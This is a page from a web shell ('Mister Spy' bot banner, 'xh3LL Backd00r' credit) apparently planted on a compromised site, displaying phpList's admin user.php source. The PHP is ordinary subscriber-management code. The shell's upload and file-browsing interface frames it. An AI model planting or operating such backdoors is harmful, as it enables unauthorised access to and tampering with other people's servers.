Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/phplist/lists/admin/commonlib/pages/
Upload File :
Current File : /home/caballoscriollos/www/phplist/lists/admin/commonlib/pages/user.php

<?php

if (!defined('PHPLISTINIT')) exit;

$id = sprintf('%d',isset($_GET["id"]) ? $_GET['id']:0);
$delete = sprintf('%d',isset($_GET['delete']) ? $_GET["delete"]:0);
$date = new Date();
$newuser = 0;
$feedback = '';

$access = accessLevel("user");
switch ($access) {
  case "owner":
    $subselect = sprintf(' and %s.owner = %d',$tables["list"],$_SESSION["logindetails"]["id"]);
    $subselect_where = sprintf(' where %s.owner = %d',$tables["list"],$_SESSION["logindetails"]["id"]);break;
  case "all":
    $subselect = "";$subselect_where = '';break;
  case "view":
    $subselect = "";
    if (sizeof($_POST)) {
      print Error($GLOBALS['I18N']->get('You only have privileges to view this page, not change any of the information'));
      return;
    }
    break;
  case "none":
  default:
    $subselect = " and ".$tables["list"].".id = 0";
    $subselect_where = " where ".$tables["list"].".owner = 0";break;
}

if ($access != "all") {
  $delete_message =$GLOBALS['I18N']->get('Delete will remove subscriber from the list');
} else {
  $delete_message = $GLOBALS['I18N']->get('Delete will remove subscriber from the system');
}

$usegroups = Sql_Table_exists("groups") && Sql_Table_exists('user_group');
$error_exist = 0;

if (!empty($_POST["change"]) && ($access == "owner"|| $access == "all")) {
  if (!verifyToken()) {
    print Error($GLOBALS['I18N']->get('Invalid security token, please reload the page and try again'));
    return;
  }
  if (isset($_POST['email']) && !empty($_POST['email'])) {
    ## let's not validate here, an admin can add anything as an email, if they like, well, except for HTML
    $email = strip_tags($_POST['email']);
  } else {
    $email = '';
  }

  if (!$error_exist && !empty($email)){
     if (!$id) {
       $id = addNewUser($email);
       Redirect("user&id=$id");
       exit;
     }
   
     if (!$id) {
       print $GLOBALS['I18N']->get('Error adding subscriber, please check that the subscriber exists');
       $error_exist = 1;
       //return;
     }
  }


  /************ BEGIN <whitout_error IF block>  (end in line 264) **********************/
  if (!$error_exist){
     # read the current values to compare changes
     $old_data = Sql_Fetch_Array_Query(sprintf('select * from %s where id = %d',$tables["user"],$id));
     $old_data = array_merge($old_data,getUserAttributeValues('',$id));
   
     # and membership of lists
     $old_listmembership = array();
     $req = Sql_Query("select * from {$tables["listuser"]} where userid = $id");
     while ($row = Sql_Fetch_Array($req)) {
       $old_listmembership[$row["listid"]] = listName($row["listid"]);
     }
   
     while (list ($key,$val) = each ($struct)) {
       if (is_array($val)) {
         if (isset($val[1]) && strpos($val[1],':')) {
           list($a,$b) = explode(":",$val[1]);
         } else {
           $a = $b = '';
         }
         if (strpos($a,"sys") === false && $val[1]) {
           if ($key == "password") {
             if (!empty($_POST[$key])){
               Sql_Query("update {$tables["user"]} set $key = \"".encryptPass($_POST[$key])."\" where id = $id");
             }
           } else {
             if ($key != "password" || !empty($_POST[$key])){
               if ($key == "password") {
                 $_POST[$key] = hash("sha256",$_POST[$key]);
               }

               Sql_Query("update {$tables["user"]} set $key = \"".sql_escape($_POST[$key])."\" where id = $id");
             }
           }
         } elseif ((!$require_login || ($require_login && isSuperUser())) && $key == "confirmed") {
           Sql_Query("update {$tables["user"]} set $key = \"".sql_escape($_POST[$key])."\" where id = $id");
         }
       }
     }
   
     if ( !empty($_FILES) && is_array($_FILES) ) { ## only avatars are files
        foreach ($_FILES['attribute']['name'] as $key => $val) {
           if (!empty($_FILES['attribute']['name'][$key])) {
              $tmpnam = $_FILES['attribute']['tmp_name'][$key];
              $size = $_FILES['attribute']['size'][$key];
   
              if ($size < MAX_AVATAR_SIZE) {
                 $avatar = file_get_contents($tmpnam);
                 Sql_Query(sprintf('replace into %s (userid,attributeid,value)
                 values(%d,%d,"%s")',$tables["user_attribute"],$id,$key,base64_encode($avatar)));
              } elseif ($size) {
                print Error($GLOBALS['I18N']->get('Uploaded avatar file too big'));
              }
           } 
        }
     }
   
     if (isset($_POST['attribute']) && is_array($_POST['attribute'])) {
       foreach ($_POST['attribute'] as $key => $val) {
         Sql_Query(sprintf('replace into %s (userid,attributeid,value)
           values(%d,%d,"%s")',$tables["user_attribute"],$id,$key,sql_escape($val)));
       }
     }
   
     if (isset($_POST['dateattribute']) && is_array($_POST["dateattribute"]))
     foreach ($_POST["dateattribute"] as $attid => $attname) {
       if (isset($_POST[normalize($attname).'_novalue'])) {
         $value = "";
       } else {
         $value = $date->getDate($attname);
       }
       Sql_Query(sprintf('replace into %s (userid,attributeid,value)
         values(%d,%d,"%s")',$tables["user_attribute"],$id,$attid,$value));
     }

     if (isset($_POST['cbattribute']) && is_array($_POST['cbattribute'])) {
       while (list($key,$val) = each ($_POST['cbattribute'])) {
         if (isset($_POST['attribute'][$key]) && $_POST['attribute'][$key] == "on") {
           Sql_Query(sprintf('replace into %s (userid,attributeid,value)
             values(%d,%d,"on")',$tables["user_attribute"],$id,$key));
         } else {
           Sql_Query(sprintf('replace into %s (userid,attributeid,value)
             values(%d,%d,"")',$tables["user_attribute"],$id,$key));
         }
       }
     }
   
     if (isset($_POST['cbgroup']) && is_array($_POST['cbgroup'])) {
       while (list($key,$val) = each ($_POST['cbgroup'])) {
         $field = "cbgroup".$val;
         if (isset($_POST[$field]) && is_array($_POST[$field])) {
           $newval = array();
           foreach ($_POST[$field] as $fieldval) {
             array_push($newval,sprintf('%0'.$checkboxgroup_storesize.'d',$fieldval));
           }
           $value = join(",",$newval);
         } else {
           $value = "";
         }
         Sql_Query(sprintf('replace into %s (userid,attributeid,value)
           values(%d,%d,"%s")',$tables["user_attribute"],$id,$val,$value));
       }
     }
     if ($usegroups && empty($GLOBALS['config']['usergroup_types'])) {
       ## old method, using checkboxes
       Sql_Query("delete from user_group where userid = $id");
       if (is_array($_POST["groups"])) {
         foreach ($_POST["groups"] as $group) {
           Sql_Query(sprintf('insert into user_group (userid,groupid) values(%d,%d)',$id,$group));
           $feedback .= "<br/>".$GLOBALS['I18N']->get('Subscriber added to group').' '.groupName($group);
         }
       }
     } elseif ($usegroups) {
       ## new method, allowing a group membership type
       $newgrouptype = sprintf('%d',$_POST['newgrouptype']);
       $newgroup = sprintf('%d',$_POST['newgroup']);
       
       if (!empty($newgrouptype) && !empty($newgroup)) {
         Sql_Query(sprintf('insert into user_group (userid,groupid,type) values(%d,%d,%d)',$id,$newgroup,$newgrouptype));
         $feedback .= "<br/>".$GLOBALS['I18N']->get('Subscriber added to group').' '.groupName($newgroup);
       } 
       ## make sure they're in the everyone group
       Sql_Query(sprintf('insert ignore into user_group (userid,groupid,type) values(%d,%d,0)',$id,getEveryoneGroupID()));
     }
      
      $new_lists = array_values($_POST['subscribe']);
      $new_subscriptions = array();
      array_shift($new_lists );// remove dummy
      foreach ($new_lists as $list) {
        $listID = sprintf('%d',$list);
        $new_subscriptions[$listID] = listName($listID);
      }
      
      $subscribed_to = array_diff_assoc($new_subscriptions, $old_listmembership);
      $unsubscribed_from = array_diff_assoc($old_listmembership,$new_subscriptions);
       
     # submitting page now saves everything, so check is not necessary
     if ($subselect == "") {
       foreach ($unsubscribed_from as $listId => $listName) {
         Sql_Query(sprintf('delete from %s where userid = %d and listid = %d',$tables["listuser"],$id,$listId));
         $feedback .= '<br/>'.sprintf(s('Subscriber removed from list %s'),$listName);
      }
     } elseif (sizeof($unsubscribed_from)) {
       # only unsubscribe from the lists of this admin
       $req = Sql_Query("select id,name from {$tables["list"]} $subselect_where and id in (".join(",",array_keys($unsubscribed_from)).")");
       while ($row = Sql_Fetch_Row($req)) {
         Sql_Query("delete from {$tables["listuser"]} where userid = $id and listid = $row[0]");
         $feedback .= '<br/>'.sprintf(s('Subscriber removed from list %s'),$row[1]);
       }
     }
     if (sizeof($subscribed_to)) {
       foreach ($subscribed_to as $listID => $listName) {
         Sql_Query("insert into {$tables["listuser"]} (userid,listid,entered,modified) values($id,$listID,now(),now())");
         $feedback .= '<br/>'.sprintf($GLOBALS['I18N']->get('Subscriber added to list %s'),$listName);
       }
       $feedback .= "<br/>";
     }
     $history_entry = '';
     $current_data = Sql_Fetch_Array_Query(sprintf('select * from %s where id = %d',$tables["user"],$id));
     $current_data = array_merge($current_data,getUserAttributeValues('',$id));
   
     foreach ($current_data as $key => $val) {
       if (!is_numeric($key))
       if (isset($old_data[$key]) && $old_data[$key] != $val && $key != "modified") {
         if ($old_data[$key] == '') $old_data[$key] = s('(no data)');
         $history_entry .= "$key = $val\n".s('changed from'). " $old_data[$key]\n";
        }
     }
     if (!$history_entry) {
       $history_entry = "\n".s('No data changed')."\n";
     }

     foreach ($subscribed_to as $key => $desc) {
       $history_entry .= s("Subscribed to %s",$desc)."\n";
     }
     foreach ($unsubscribed_from as $key => $desc) {
       $history_entry .= s("Unsubscribed from %s",$desc)."\n";
     }
   
     addUserHistory($email,s("Update by %s",adminName($_SESSION["logindetails"]["id"])),$history_entry);
     if (empty($newuser)) {
       $_SESSION['action_result'] = s('Changes saved').$feedback;
     }
     Redirect("user&id=$id");
     exit;

  }
  /************ END <whitout_error IF block>  (start in line 71) **********************/
}
   
   if (isset($delete) && $delete && $access != "view") {
     verifyCsrfGetToken();
     # delete the index in delete
     $_SESSION['action_result'] = s('Deleting')." $delete ..\n";
     if ($require_login && !isSuperUser()) {
       $lists = Sql_query("SELECT listid FROM {$tables["listuser"]},{$tables["list"]} where userid = ".$delete." and $tables[listuser].listid = $tables[list].id $subselect ");
       while ($lst = Sql_fetch_array($lists))
         Sql_query("delete from {$tables["listuser"]} where userid = $delete and listid = $lst[0]");
     } else {
       ## this action is no longer visible, but can stay here.
       deleteUser($delete);
     }
     $_SESSION['action_result'] .= '..'.s('Done')."\n";
     Redirect('user');
   }
   
   if ($usegroups && !empty($GLOBALS['config']['usergroup_types']) && $access != "view") {
     ## check for deletion of group membership
     $delgroup = sprintf('%d',$_GET['delgroup']);
     $delgrouptype = sprintf('%d',$_GET['deltype']);
     if (!empty($delgroup)) {# && !empty($delgrouptype)) {
       Sql_Query(sprintf('delete from user_group where userid = %d and groupid = %d and type = %d',$id,$delgroup,$delgrouptype));
       print "<br/>".$GLOBALS['I18N']->get('Subscriber removed from group').' '.groupName($delgroup).' ';
       print PageLink2('user&amp;id='.$id,$GLOBALS['I18N']->get('Continue'));
       return;
     }
   }


/********* NORMAL FORM DISPLAY ***********/
$membership = "";
$subscribed = array();
if ($id) {
  $result = Sql_query(sprintf('select * from %s where id = %d', $tables["user"],$id));

  if (!Sql_Affected_Rows()) {
    Fatal_Error(s('No such subscriber'));
    return;
  }

  $user = sql_fetch_array($result);
  $lists = Sql_query("SELECT listid,name FROM {$tables["listuser"]},{$tables["list"]} where userid = ".$user["id"]." and $tables[listuser].listid = $tables[list].id $subselect ");

  while ($lst = Sql_fetch_array($lists)) {
    $membership .= "<li>".PageLink2("editlist",$lst["name"],"id=".$lst["listid"]).'</li>';
    array_push($subscribed,$lst["listid"]);
  }

  if (!$membership)
  $membership = $GLOBALS['I18N']->get('No Lists');

  if (empty($returnurl)) { $returnurl = ''; }

  print '<div class="actions">';
  print '&nbsp;&nbsp;'.PageLinkButton("userhistory&amp;id=$id",$GLOBALS['I18N']->get('History'));
  if (!empty($GLOBALS['config']['plugins']) && is_array($GLOBALS['config']['plugins'])) {
    foreach ($GLOBALS['config']['plugins'] as $pluginName => $plugin) {
      print $plugin->userpageLink($id);
    }
  }

  if ($access == "all") {
    $delete = new ConfirmButton(
       htmlspecialchars(s('Are you sure you want to remove this subscriber from the system.')),
       PageURL2("user&delete=$id&amp;$returnurl".addCsrfGetToken(),"button",s('remove subscriber')),
       s('remove subscriber'));
    print $delete->show();
  }

  print '</div>';
} else {

  if (!empty($_POST["subscribe"])){
     foreach($_POST["subscribe"] AS $idx => $listid){
        array_push($subscribed, $listid);
     }
  }

  $id = 0;
  print '<h3>'.s('Add a new subscriber').'</h3>';
  if (empty($_POST['email'])) {
    print formStart();
    print s('Email address').': '.'<input type="text" name="email" value="" />';
    print '<input type="submit" name="change" value="'.s('Continue').'">';
    print '</form>';
    return;
  }
}

print formStart('enctype="multipart/form-data"');
if ( empty ($list) ) { $list = ''; }
print '<input type="hidden" name="list" value="'.$list.'" /><input type="hidden" name="id" value="'.$id.'" />';
if ( empty ($returnpage) ) { $returnpage = ''; }
if ( empty ($returnoption) ) { $returnoption = ''; }
print '<input type="hidden" name="returnpage" value="'.$returnpage.'" /><input type="hidden" name="returnoption" value="'.$returnoption.'" />';

reset($struct);

$userdetailsHTML = $mailinglistsHTML = $groupsHTML =  '';
$userdetailsHTML .= '<table class="userAdd" border="1">';


while (list ($key,$val) = each ($struct)) {
  @list($a,$b) = explode(":",$val[1]);

  if (!isset($user[$key]))
  $user[$key] = "";

  if ($key == "confirmed") {
    if (!$require_login || ($require_login && isSuperUser())) {
      $userdetailsHTML .= sprintf('<tr><td class="dataname">%s (1/0)</td><td><input type="text" name="%s" value="%s" size="5" /></td></tr>'."\n",$GLOBALS['I18N']->get($b),$key,htmlspecialchars(stripslashes($user[$key])));
    } else {
      $userdetailsHTML .= sprintf('<tr><td class="dataname">%s</td><td>%s</td></tr>',$b,stripslashes($user[$key]));
    }
  } elseif ($key == "password") {
    $userdetailsHTML .= sprintf('<tr><td class="dataname">%s</td><td><input type="text" name="%s" value="%s" size="30" /></td></tr>'."\n",$val[1],$key,"");
  } elseif ($key == "blacklisted") {
    $userdetailsHTML .= sprintf('<tr><td class="dataname">%s</td><td>%s',$GLOBALS['I18N']->get($b),$user[$key] || isBlackListed($user['email'])?s('Yes'):s('No'));
    
    if (!($user[$key] || isBlackListed($user['email']))) {
      $userdetailsHTML .= '<span class="fright button">'.PageLinkAjax('user&blacklist=1&id='.$user['id'],s('Add to blacklist')).'</span>';
    } elseif (UNBLACKLIST_IN_PROFILE) {
      $userdetailsHTML .= '<span class="fright button">'.PageLinkAjax('user&unblacklist=1&id='.$user['id'],s('Remove from blacklist')).'</span>';
    }
    $userdetailsHTML .= '</td></tr>';
    
  } else {
    if (!strpos($key,'_')) {
      if (strpos($a,"sys") !== false)
        $userdetailsHTML .= sprintf('<tr><td class="dataname">%s</td><td>%s</td></tr>',$GLOBALS['I18N']->get($b),stripslashes($user[$key]));
      elseif ($val[1])
        $userdetailsHTML .= sprintf('<tr><td class="dataname">%s</td><td><input type="text" name="%s" value="%s" size="30" /></td></tr>'."\n",$GLOBALS['I18N']->get($val[1]),$key,htmlspecialchars(stripslashes($user[$key])));
    }
  }
}

if (empty($GLOBALS['config']['hide_user_attributes']) && !defined('HIDE_USER_ATTRIBUTES')) {
  $res = Sql_Query("select * from $tables[attribute] order by listorder");

  while ($row = Sql_fetch_array($res)) {
    if (!empty($id)) {
       $val_req = Sql_Fetch_Row_Query("select value from $tables[user_attribute] where userid = $id and attributeid = $row[id]");
       $row["value"] = $val_req[0];
    } elseif (!empty($_POST["attribute"][$row["id"]])) {
       $row["value"] = $_POST["attribute"][$row["id"]];
    } else {
      $row['value'] = '';
    }

    if ($row["type"] == "date") {
      $userdetailsHTML .= sprintf('<input class="attributeinput" type="hidden" name="dateattribute[%d]" value="%s" />',$row["id"],$row["name"]);
      $novalue = trim($row["value"]) == "" ? "checked":"";
      $userdetailsHTML .= sprintf('<tr><td class="dataname">%s<!--%s--></td><td>%s&nbsp; Not set: <input type="checkbox" name="%s_novalue" %s /></td></tr>'."\n",stripslashes($row["name"]),$row["value"],$date->showInput($row["name"],"",$row["value"]),normalize(stripslashes($row["name"])),$novalue);
    } elseif ($row["type"] == "checkbox") {
      $checked = $row["value"] == "on" ? 'checked="checked"':'';
      $userdetailsHTML .= sprintf('<tr><td class="dataname">%s</td><td><input class="attributeinput" type="hidden" name="cbattribute[%d]" value="%d" />
                        <input class="attributeinput" type="checkbox" name="attribute[%d]" value="on" %s />
              </td></tr>'."\n",stripslashes($row["name"]),$row["id"],$row["id"],$row["id"],$checked);
    } elseif ($row["type"] == "checkboxgroup") {
      $userdetailsHTML .= sprintf ('
           <tr><td valign="top" class="dataname">%s</td><td>%s</td>
           </tr>',stripslashes($row["name"]),UserAttributeValueCbGroup($id,$row["id"]));
    } elseif ($row["type"] == "textarea") {
      $userdetailsHTML .= sprintf ('
           <tr><td valign="top" class="dataname">%s</td><td><textarea name="attribute[%d]" rows="10" cols="40" class="wrap virtual">%s</textarea></td>
           </tr>',stripslashes($row["name"]),$row["id"],htmlspecialchars(stripslashes($row["value"])));
    } elseif ($row["type"] == "avatar") {
      $userdetailsHTML .= sprintf ('<tr><td valign="top" class="dataname">%s</td><td>',stripslashes($row["name"]));
      if ($row['value']) {
        $userdetailsHTML .= sprintf('<img src="./?page=avatar&amp;user=%d&amp;avatar=%s" /><br/>',$id,$row['id']);
      }
      $userdetailsHTML .= sprintf ('<input type="file" name="attribute[%d]" /><br/>MAX: %d Kbytes</td>
           </tr>',$row["id"],MAX_AVATAR_SIZE/1024);
    } else {
    if ($row["type"] != "textline" && $row["type"] != "hidden")
      $userdetailsHTML .= sprintf ("<tr><td class='dataname'>%s</td><td>%s</td></tr>\n",stripslashes($row["name"]),UserAttributeValueSelect($id,$row["id"]));
    else
      $userdetailsHTML .= sprintf('<tr><td class="dataname">%s</td><td><input class="attributeinput" type="text" name="attribute[%d]" value="%s" size="30" /></td></tr>'."\n",$row["name"],$row["id"],htmlspecialchars(stripslashes($row["value"])));
    }
  }
}

if ($access != "view")
$userdetailsHTML .=  '<tr><td colspan="2" class="bgwhite"><input class="submit" type="submit" name="change" value="'.$GLOBALS['I18N']->get('Save Changes').'" /></td></tr>';
$userdetailsHTML .= '</table>';

if (isBlackListed($user["email"])) {
   $userdetailsHTML .= '<h3>'.s('Subscriber is blacklisted. No emails will be sent to this email address.').'</h3>';
}

$mailinglistsHTML .= "<h3>".$GLOBALS['I18N']->get('Mailinglist membership').":</h3>";
// a dummy entry, to make the array show up in POST even if all checkboxes are unchecked
$mailinglistsHTML .= '<input type="hidden" name="subscribe[]" value="-1" />';
$mailinglistsHTML .= '<table class="userListing" border="1"><tr>';
$req = Sql_Query("select * from {$tables["list"]} $subselect_where order by listorder,name");
$c = 0;
while ($row = Sql_Fetch_Array($req)) {
  $c++;
  if ($c % 1 == 0)
    $mailinglistsHTML .= '</tr><tr>';
  if (in_array($row["id"],$subscribed)) {
    $bgcol = '#F7E7C2';
    $subs = 'checked="checked"';
  } else {
    $bgcol = '#ffffff';
    $subs = "";
  }
  $mailinglistsHTML .=sprintf ('<td class="tdcheck" bgcolor="%s"><input type="checkbox" name="subscribe[]" value="%d" %s /> %s</td>',
    $bgcol,$row["id"],$subs,stripslashes($row["name"]));
}
$mailinglistsHTML .= '</tr>';
if ($access != "view")
  $mailinglistsHTML .= '<tr><td class="bgwhite"><input class="submit" type="submit" name="change" value="'.$GLOBALS['I18N']->get('Save Changes').'" /></td></tr>';

$mailinglistsHTML .= '</table>';

if ($usegroups) {
  $groupsHTML  .= "<h3>".$GLOBALS['I18N']->get('Group Membership').":</h3>";
  $groupsHTML  .= '<table class="userGroup" border="1">';
  $groupsHTML  .= '<tr><td colspan="2"><hr width="50%" /></td></tr>
<tr><td colspan="2">'.$GLOBALS['I18N']->get('Please select the groups this subscriber is a member of').'</td></tr>
<tr><td colspan="2">';
  
  if (empty($GLOBALS['config']['usergroup_types'])) {
    
    ## old method, list of checkboxes
  
    $selected_groups = array();
    if ($id) {
      $req = Sql_Query("select groupid from user_group where userid = $id");
      while ($row = Sql_Fetch_Row($req))
        array_push($selected_groups,$row[0]);
    }

    $req = Sql_Query("select * from groups");
    $c = 1;
    while ($row = Sql_Fetch_array($req)) {
      if ($row["name"] != "Everyone") {
        $groupsHTML  .= sprintf ('<i>%s</i><input type="checkbox" name="groups[]" value="%d" %s />&nbsp;&nbsp;',
        $row["name"],$row["id"],in_array($row["id"],$selected_groups)?'checked="checked"':''
            );
      } else {
        $groupsHTML  .=sprintf ('<b>%s</b>&nbsp;&nbsp;<input type="hidden" name="groups[]" value="%d" />',
        $row["name"],$row["id"]
            );
      }
      if ($c % 5 == 0)
        $groupsHTML  .= "<br/>";
      $c++;
    }
  } else {
    $current_groups = array();
    if ($id) {
      $req = Sql_Query("select groupid,type from user_group where userid = $id");
      $groupsHTML  .= '<ol>';
      while ($row = Sql_Fetch_Assoc($req)) {
        ## the config needs to start real types with 1, type index 0 will be considered no-value
        $membership_type = $GLOBALS['config']['usergroup_types'][$row['type']];
        if (empty($membership_type) || empty($row['type'])) {
          # $membership_type = 'undefined'; an entry "undefined of everyone" was showing in the backend
          continue;
        }
        $groupname = groupName($row['groupid']);
        $deleteLink = '';
        if (strtolower($groupname) != 'everyone') {
          $deleteLink =  PageLink2('user&amp;id='.$id.'&amp;delgroup='.$row['groupid'].'&amp;deltype='.$row['type'],'del');
        }
        $groupsHTML  .=sprintf('<li><strong>%s</strong> of <i>%s</i> %s</li>',$membership_type,$groupname,$deleteLink);
      }
      $groupsHTML  .= '</ol>';
    }

    $req = Sql_Query('select * from groups where name != "everyone"');
    $c = 1;
    
    while ($row = Sql_Fetch_array($req)) {
      $groups[$row['id']] = $row['name'];
    }
    
    $groupsHTML  .= '<hr/>Add new group membership:<br/><br/>';
    $groupsHTML  .= '<select name="newgrouptype">';
    foreach ($GLOBALS['config']['usergroup_types'] as $key => $val) {
      $groupsHTML  .=sprintf ('    <option value="%d">%s</option>',$key,$val);
    }
    $groupsHTML  .= '</select>';
    $groupsHTML  .= ' of ';
    $groupsHTML  .= '<select name="newgroup">';
    foreach ($groups as $key => $val) {
      $groupsHTML  .=sprintf ('<option value="%d">%s</option>',$key,$val);
    }
    $groupsHTML  .= '</select>';
  }  

  $groupsHTML  .= '</td></tr>';
  if ($access != "view")
    $groupsHTML  .= '<tr><td><input type="submit" name="change" value="'.$GLOBALS['I18N']->get('Save changes').'" /></td></tr>';
  $groupsHTML  .= '</table>';
}

print '<div class="tabbed">';
print '<ul>';
print '<li><a href="#details">'.ucfirst($GLOBALS['I18N']->get('Details')).'</a></li>';
print '<li><a href="#lists">'.ucfirst($GLOBALS['I18N']->get('Lists')).'</a></li>';
if ($usegroups) {
  print '<li><a href="#groups">Groups</a></li>';
}
print '</ul>';

$p = new UIPanel('',$userdetailsHTML);
print '<div id="details">'.$p->display().'</div>';

$p = new UIPanel('',$mailinglistsHTML);
print '<div id="lists">'.$p->display().'</div>';

if ($usegroups) {
  $p = new UIPanel($GLOBALS['I18N']->get('Groups'),$groupsHTML);
  print '<div id="groups">'.$p->display().'</div>';
}
print '</div>'; ## end of tabbed



print '</form>';

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat